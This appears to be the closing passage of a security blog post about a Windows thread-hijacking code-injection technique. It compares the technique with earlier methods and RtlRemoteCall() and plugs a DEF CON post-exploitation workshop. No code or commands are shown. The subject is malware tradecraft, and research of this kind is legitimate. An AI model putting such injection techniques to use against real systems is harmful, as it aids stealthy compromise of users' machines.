I've seen similar (but non-successful) techniques for code injection. I found a rare amount of similar information [1] [2]. These techniques were not interested in performing proper cleanup of the stolen thread, which is not practical in many circumstances. This is essentially the same process that RtlRemoteCall() follows. As such, there may be issues for threads in a wait state returning an incorrect status? None of these sources uses reflective restoration.

As user mode API is highly explored territory, this may not be an original technique. If so, take the example for what it is ([relatively] clean code with academic explanation) and chalk it up to multiple discovery. Leave flames, spam, and questions in the comments!

If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.